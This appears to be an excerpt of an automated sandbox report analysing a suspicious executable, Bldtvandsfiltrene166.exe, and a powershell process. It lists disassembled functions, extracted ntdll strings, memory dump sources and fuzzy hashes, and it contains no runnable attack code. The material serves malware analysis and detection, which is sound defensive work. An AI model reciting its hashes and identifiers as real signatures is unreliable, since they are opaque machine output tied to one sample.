Download Yara Rule

Strings

4'q, xrefs: 07B502EB
4'q, xrefs: 07B502F7
$q, xrefs: 07B50352
4'q, xrefs: 07B50373
$q, xrefs: 07B5035E
4'q, xrefs: 07B5037F

Memory Dump Source

Source File: 00000002.00000002.1909995331.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b50000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q$$q$$q
API String ID: 0-448788557
Opcode ID: 020804b30fad88ffe966ebbc430681073a100bdc2d2baa23d94b25b2b7616d26
Instruction ID: 996026c4046247d26974b8f60ce80d679484ca5c8b8d14282bc6fb20d3a429b5
Opcode Fuzzy Hash: 020804b30fad88ffe966ebbc430681073a100bdc2d2baa23d94b25b2b7616d26
Instruction Fuzzy Hash: CE2108A17093574FE7262678342136A6BA2AFC665072D80EBDC41CB342CE328C078382

Function 07B5EB30 Relevance: 6.4, Strings: 5, Instructions: 185COMMON

Download Yara Rule

Strings

$q, xrefs: 07B5EBAB
4'q, xrefs: 07B5EE02
$q, xrefs: 07B5EBCC
$q, xrefs: 07B5ED8A
tPq, xrefs: 07B5ECCA

Memory Dump Source

Source File: 00000002.00000002.1909995331.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b50000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$tPq$$q$$q$$q
API String ID: 0-838716513
Opcode ID: 414c8aaa0cea137e52370395c29280f26f6cbcf559f185527bff159c34a1f14f
Instruction ID: 1ef740c5bf1e7f90bca6550fc2a43691e5e7b0f9d57f27c3a74fb60ce9180477
Opcode Fuzzy Hash: 414c8aaa0cea137e52370395c29280f26f6cbcf559f185527bff159c34a1f14f
Instruction Fuzzy Hash: DC616FF161020ADFFB298E14D5857AA77A2EF45351F1C85E6EC059F290C771EE80CBA1

Function 07B50538 Relevance: 6.4, Strings: 5, Instructions: 148COMMON

Download Yara Rule

Strings

4'q, xrefs: 07B50626
$q, xrefs: 07B505FD
$q, xrefs: 07B505C4
4'q, xrefs: 07B50632
$q, xrefs: 07B50609

Memory Dump Source

Source File: 00000002.00000002.1909995331.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b50000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$$q$$q$$q
API String ID: 0-170447905
Opcode ID: 6022611e084dd08610c6bffa702bf8bd26865f881b4edd4797f6dd971f0b9b84
Instruction ID: 0be32ef8522135c5351ebd08d6f9508419e7d728424c50bbf566c5d39d7d45da
Opcode Fuzzy Hash: 6022611e084dd08610c6bffa702bf8bd26865f881b4edd4797f6dd971f0b9b84
Instruction Fuzzy Hash: 8741D6F1B043069FEB256B34E8107BE7BA1EFC5311F1484AADD05CB291DA35C945C7A2

Function 07B54DBE Relevance: 6.3, Strings: 5, Instructions: 85COMMON

Download Yara Rule

Strings

$q, xrefs: 07B54E47
tPq, xrefs: 07B54E8C
$q, xrefs: 07B54DF0
$q, xrefs: 07B54E0C
$q, xrefs: 07B54E28

Memory Dump Source

Source File: 00000002.00000002.1909995331.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b50000_powershell.jbxd

Similarity

API ID:
String ID: tPq$$q$$q$$q$$q
API String ID: 0-3665043458
Opcode ID: da4626363617f05da568d68cc54898bbe0760d3ed599ba9b130a7fad6afb66ea
Instruction ID: e62d3c01dd8c39b321743b3709771b2936dc22b10c54bb607ba06a18073f8844
Opcode Fuzzy Hash: da4626363617f05da568d68cc54898bbe0760d3ed599ba9b130a7fad6afb66ea
Instruction Fuzzy Hash: 5E315AF6604392CFEB298F64E940BA9BBB5EF42710F1940EAED049B252D731DC84C761

Function 07B5DD26 Relevance: 6.3, Strings: 5, Instructions: 85COMMON

Download Yara Rule

Strings

d%q, xrefs: 07B5DD9F
4'q, xrefs: 07B5DE77
tPq, xrefs: 07B5DDD9
d%q, xrefs: 07B5DE03
d%q, xrefs: 07B5DE0D

Memory Dump Source

Source File: 00000002.00000002.1909995331.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b50000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$d%q$d%q$d%q$tPq
API String ID: 0-706544200
Opcode ID: abc0c7c6d69c96c7d67ee6a4db098191b4685a615a6128e986eccabe545c2f15
Instruction ID: ab46ba43283d881fae0db4504809eaba7a2bde6fa4c813ea6b9871132bb2876c
Opcode Fuzzy Hash: abc0c7c6d69c96c7d67ee6a4db098191b4685a615a6128e986eccabe545c2f15
Instruction Fuzzy Hash: D4314CB4B00216DFEB28DF54D495B69F7A2FF98610F298699ED05AB340C732DC42CB91

Function 07B5D4F0 Relevance: 5.5, Strings: 4, Instructions: 471COMMON

Download Yara Rule

Strings

(oq, xrefs: 07B5D5D6
(oq, xrefs: 07B5D5E6
(oq, xrefs: 07B5D929
(oq, xrefs: 07B5D919

Memory Dump Source

Source File: 00000002.00000002.1909995331.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b50000_powershell.jbxd

Similarity

API ID:
String ID: (oq$(oq$(oq$(oq
API String ID: 0-3853041632
Opcode ID: 0252f23c7e91405f8c4d89b8144be0767e1f06bd3f02e0bf841944a29a17c795
Instruction ID: 7ba457d445f92114365a2309a57c6580dffd2d40be675cae8f43038089d784b8
Opcode Fuzzy Hash: 0252f23c7e91405f8c4d89b8144be0767e1f06bd3f02e0bf841944a29a17c795
Instruction Fuzzy Hash: BFF146F1B04306CFFB159F64D8947AABBA2EF85311F1486AAED05CB291CB31D841CB91

Function 07B5EEF8 Relevance: 5.1, Strings: 4, Instructions: 115COMMON

Download Yara Rule

Strings

tPq, xrefs: 07B5EFFC
$q, xrefs: 07B5EF75
XRq, xrefs: 07B5F08D
XRq, xrefs: 07B5EF59

Memory Dump Source

Source File: 00000002.00000002.1909995331.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b50000_powershell.jbxd

Similarity

API ID:
String ID: XRq$XRq$tPq$$q
API String ID: 0-1549039314
Opcode ID: 79caa6a64e35379c39365d9bc3c8e2c4404c20904ec8cae33d210e214772eeef
Instruction ID: 11da348a94651a7cc31f82561cee7a3e44259328663b8d0dc0bdce6f6807f6d8
Opcode Fuzzy Hash: 79caa6a64e35379c39365d9bc3c8e2c4404c20904ec8cae33d210e214772eeef
Instruction Fuzzy Hash: B0414CB4A00206DFEB248E55C544BB9F7F2EB89210F5D80EAED046F290C772D945CB61

Function 07B536A0 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$q, xrefs: 07B53708
$q, xrefs: 07B536B2
$q, xrefs: 07B536CE
$q, xrefs: 07B536FC

Memory Dump Source

Source File: 00000002.00000002.1909995331.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b50000_powershell.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q
API String ID: 0-4102054182
Opcode ID: a1ad8326f875f8bd132e2dc044f00b80a649928e34a9b5b5afe3b9d4c253b732
Instruction ID: 6f8f4941507de6d8fa79b4dd64573047ca90dd09775a81cbc4b0c69b50a15e20
Opcode Fuzzy Hash: a1ad8326f875f8bd132e2dc044f00b80a649928e34a9b5b5afe3b9d4c253b732
Instruction Fuzzy Hash: 0D216BF17103065BFB34556AA811F27B7D6DBC2799F24846EAD05CB381DD32C8418361

Analysis Process: Bldtvandsfiltrene166.exePID: 7500, Parent PID: 5832COMMON

Execution Graph

Execution Coverage:	0%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	100%
Total number of Nodes:	1
Total number of Limit Nodes:	0

Executed Functions

Function 211B2DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 211B2DFA

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b729b93b13837f693cb43075c3191a4ff1acaf0a5d539705633dc0da302f2fd8
Instruction ID: 3d7788323c0d6d6d8f6cc483e0731c89484178439b20144effb7ec920bf63b04
Opcode Fuzzy Hash: b729b93b13837f693cb43075c3191a4ff1acaf0a5d539705633dc0da302f2fd8
Instruction Fuzzy Hash: 5E90023120140413D111715D4584707040957E0641F95C422A0425518DD667CB52A222

Function 211B2C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 211B2C7A

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1175b2d1db6f5c810b5d10ac3d0cd21769e51b506144741dea6a38a30e41b5d8
Instruction ID: 642fc2068c53ebdb9c158b696cab0bb492e453134aa9aab7ff1ab8d0d10e062d
Opcode Fuzzy Hash: 1175b2d1db6f5c810b5d10ac3d0cd21769e51b506144741dea6a38a30e41b5d8
Instruction Fuzzy Hash: 5190023120148802D110715D848474A040557E0701F59C421A4425618DC6A6CA917222

Function 211B35C0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 211B35CA

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2efec575eacdb69239d0cf5df71a37584de3210ccb547e60b9db3cf599de4887
Instruction ID: 9127c463a745c508050215e2cc3043f157f867bcdd5c4e9f9d37ada149334426
Opcode Fuzzy Hash: 2efec575eacdb69239d0cf5df71a37584de3210ccb547e60b9db3cf599de4887
Instruction Fuzzy Hash: F790023160550402D100715D4594706140557E0601F65C421A0425528DC7A6CB5166A3

Non-executed Functions

Function 211F2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

MaxLoaderThreads, xrefs: 211F24EC
UseImpersonatedDeviceMap, xrefs: 211F251C
CFGOptions, xrefs: 211F2967
minkernel\ntdll\ldrinit.c, xrefs: 211F3187
GlobalFlag, xrefs: 211F2F3F, 211F3059
MinimumStackCommitInBytes, xrefs: 211F2BB0
Initializing the application verifier package failed with status 0x%08lx, xrefs: 211F3176
MaxDeadActivationContexts, xrefs: 211F2D82
@, xrefs: 211F2942
ExecuteOptions, xrefs: 211F25A0
GlobalFlag2, xrefs: 211F2FC0
LdrpInitializeExecutionOptions, xrefs: 211F317D
UnloadEventTraceDepth, xrefs: 211F24C0
DisableExceptionChainValidation, xrefs: 211F275F
RaiseExceptionOnPossibleDeadlock, xrefs: 211F2579
FrontEndHeapDebugOptions, xrefs: 211F2489
ShutdownFlags, xrefs: 211F24A1
@, xrefs: 211F2B74
TracingFlags, xrefs: 211F2549
DisableHeapLookaside, xrefs: 211F246D

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 7ece3428cb8a1b6c9a79bcc511b7d5ac684340b7d93e95e808ad75898739175a
Instruction ID: 0dfc8041141bdca9a274629df7cb253dcf99d83519c158c28d6eeeadf7ad4635
Opcode Fuzzy Hash: 7ece3428cb8a1b6c9a79bcc511b7d5ac684340b7d93e95e808ad75898739175a
Instruction Fuzzy Hash: FD92AC71608742AFE725CF20C880F9BBBE8BB85754F00492DFA94D7291D774EA44CB92

Function 211A8620 Relevance: 17.7, Strings: 14, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Thread identifier, xrefs: 211E553A
Invalid debug info address of this critical section, xrefs: 211E54B6
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 211E54E2
double initialized or corrupted critical section, xrefs: 211E5508
Thread is in a state in which it cannot own a critical section, xrefs: 211E5543
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 211E540A, 211E5496, 211E5519
Critical section address., xrefs: 211E5502
undeleted critical section in freed memory, xrefs: 211E542B
corrupted critical section, xrefs: 211E54C2
Critical section address, xrefs: 211E5425, 211E54BC, 211E5534
Critical section debug info address, xrefs: 211E541F, 211E552E
Address of the debug info found in the active list., xrefs: 211E54AE, 211E54FA
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 211E54CE
8, xrefs: 211E52E3

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 382ee680316588bc9975a5831279605f53bad26a895bb1a513b884b72cd7eb8e
Instruction ID: e3548bf1d6eb93b57f48dded1e1c75050f1a40c700977461f942e4a73014bc74
Opcode Fuzzy Hash: 382ee680316588bc9975a5831279605f53bad26a895bb1a513b884b72cd7eb8e
Instruction Fuzzy Hash: 1E818EB4900649BFEB90CF96C888F9EBBB9EB09314F114129F518B7291D375AA41CB90

Function 21220274 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDebugPrintTimes.NTDLL ref: 212202A8

Strings

Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 2122069F
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 212204D3
About to reallocate block at %p to %Ix bytes, xrefs: 212203BA
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 212206EA
RtlReAllocateHeap, xrefs: 212202BF, 21220362
HEAP: , xrefs: 212203A6, 212204B5, 212205DD, 21220682, 212206D9
HEAP[%wZ]: , xrefs: 21220399, 212204A8, 212205D0, 21220675, 212206CC
Just reallocated block at %p to %Ix bytes, xrefs: 212205F1

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID: DebugPrintTimes
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 3446177414-1700792311
Opcode ID: a32b27bef810bfa10c8ded4dea4345af217b0e095302e63bacf27ac7b71011ea
Instruction ID: caa410b342e2c90358aebb70cf9ca0746a9baabe5a519a7dd40fb062e5b23256
Opcode Fuzzy Hash: a32b27bef810bfa10c8ded4dea4345af217b0e095302e63bacf27ac7b71011ea
Instruction Fuzzy Hash: 30D10F31900AC6DFDB12CF64C840AAEBFF5FF4A704F048059F5859B266D73A9A90CB18

Function 211A29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 211E22E4
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 211E2409
RtlpResolveAssemblyStorageMapEntry, xrefs: 211E261F
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 211E2412
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 211E24C0
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 211E25EB
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 211E2602
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 211E2624
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 211E2506
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 211E2498
@, xrefs: 211E259B

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: 0634be9bf298585e949de9656a5310e16de553e0903d25f0207b64cd289dbe1f
Instruction ID: 4be1c9ee04c0207e7fc530204f316a2ec9afba784936dd03c7409ebd2a8bf3cf
Opcode Fuzzy Hash: 0634be9bf298585e949de9656a5310e16de553e0903d25f0207b64cd289dbe1f
Instruction Fuzzy Hash: B1029EB5D006299FDB65CB54CC84BDABBB8AF45304F1141EAE60CA7241EB309F84CF59

Function 21218B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 21218BD0
runtimebroker.exe, xrefs: 21218B73
lsass.exe, xrefs: 21218BA1
DefaultBrowser_NOPUBLISHERID, xrefs: 21218D00
csrss.exe, xrefs: 21218B80
services.exe, xrefs: 21218B96
svchost.exe, xrefs: 21218B68
heapType, xrefs: 21218BCB
SegmentHeap, xrefs: 21218BE9
smss.exe, xrefs: 21218B8B

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: d160348f2d7091fd3f0cbe0eb8172070abd8e8375de49ec76cbcee07706e4191
Instruction ID: 41a5ec1e6583d2bb4a6fb96b63bb550af957cf94bddc1ed06c29e47aa16123aa
Opcode Fuzzy Hash: d160348f2d7091fd3f0cbe0eb8172070abd8e8375de49ec76cbcee07706e4191
Instruction Fuzzy Hash: 99519FB15153469BD329CF148C80BABBBECEF99750F504A2DFA58C2246E770D604CB92

Function 2116645D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 2116656C

Part of subcall function 211665B5: RtlDebugPrintTimes.NTDLL ref: 21166664
Part of subcall function 211665B5: RtlDebugPrintTimes.NTDLL ref: 211666AF

Strings

apphelp.dll, xrefs: 21166496
Getting the shim engine exports failed with status 0x%08lx, xrefs: 211C9A01
LdrpInitShimEngine, xrefs: 211C99F4, 211C9A07, 211C9A30
minkernel\ntdll\ldrinit.c, xrefs: 211C9A11, 211C9A3A
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 211C9A2A
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 211C99ED

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-204845295
Opcode ID: be5d05d40c07d520c409c1bfbf0e527638b55392db7f4343dc439d2a2c6a09af
Instruction ID: 8c8ffd270ea6ee7b0085b5a4db22d32f895d70a436ec8d59e1e13c8622ea6e47
Opcode Fuzzy Hash: be5d05d40c07d520c409c1bfbf0e527638b55392db7f4343dc439d2a2c6a09af
Instruction Fuzzy Hash: 1D51CE71208384EFE715CF24C881F9B77E8AB94B88F01491DF5999B1A4DA31EB04CB93

Function 211F89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

AVRF: -*- final list of providers -*- , xrefs: 211F8B8F
VerifierFlags, xrefs: 211F8C50
VerifierDebug, xrefs: 211F8CA5
VerifierDlls, xrefs: 211F8CBD
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 211F8A67
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 211F8A3D
HandleTraces, xrefs: 211F8C8F

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 8537e5170c4ef43ce1ab591a4438a9c53db8b16dc2871b0068ac0a76740be76e
Instruction ID: 57b6e77645ec2c5a5f92f43d1e49c87ec1e32ac6d070c9ff5bacb4fbcf2cf794
Opcode Fuzzy Hash: 8537e5170c4ef43ce1ab591a4438a9c53db8b16dc2871b0068ac0a76740be76e
Instruction Fuzzy Hash: 6E914372541796AFD312CF28C880F8A7BECAF54798F214468FA44AB290D734DF01CB92

Function 2119245A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

apphelp.dll, xrefs: 21192462
LdrpDynamicShimModule, xrefs: 211DA998
minkernel\ntdll\ldrinit.c, xrefs: 211DA9A2
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 211DA992

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: fa9cfd3a23aee03cf00f0da25c7d57dc835a27897054300f5d64f6bba4a1cd7c
Instruction ID: f43a43562ae56e0d323c765588aa459334536b3dc0232ea76d7b4dd514c7288d
Opcode Fuzzy Hash: fa9cfd3a23aee03cf00f0da25c7d57dc835a27897054300f5d64f6bba4a1cd7c
Instruction Fuzzy Hash: E4316B77640242EFD719CF69C988EDA77B8FB81704F168019F924672E1D7749B81CB81

Function 2117EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

R, xrefs: 2117EB62
LdrpResSearchResourceInsideDirectory Exit, xrefs: 2117EB6C
, xrefs: 2117F299
T, xrefs: 2117EB4E
{, xrefs: 211D4643
LdrpResSearchResourceInsideDirectory Enter, xrefs: 2117EB58

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

